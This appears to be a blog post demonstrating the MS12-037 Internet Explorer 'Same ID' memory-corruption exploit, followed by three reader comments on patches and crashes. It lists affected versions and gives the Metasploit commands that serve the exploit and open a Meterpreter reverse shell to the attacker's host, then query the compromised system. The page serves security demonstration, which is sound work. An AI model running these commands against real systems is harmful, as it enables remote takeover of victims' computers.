Vulnerability found exploited in the wild
Public release of the vulnerability on 2012-06-12
Metasploit PoC provided on 2012-06-13
PoC provided by:
Qihoo 360 Security Center
Affected version(s):
Internet Explorer 6
Internet Explorer 7
Internet Explorer 8
Internet Explorer 9
Tested on Windows XP Pro SP3 with:
Internet Explorer 8 (8.0.6001.18702) and msvcrt ROP
This module exploits a memory corruption flaw in Internet Explorer 8 when handling objects with the same ID property. At the moment, this module targets IE8 over Windows XP SP3 through heap massaging plus heap spray, as exploited in the wild.
use exploit/windows/browser/ms12_037_same_id
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit
sysinfo
getuid
3 thoughts on “MS12-037 Internet Explorer Same ID Vulnerability Metasploit Demo”
Are you sure that you have removed KB2699988, which is the MS12-037 patch?
Exploit is not running.
I tested a XP SP3 on Internet Explorer 8 (8.0.6001.18702).
What is this msvcrt ROP?
My IE8 crashed.
Another reason to ditch Windows XP and/or use EMET 2.0 🙂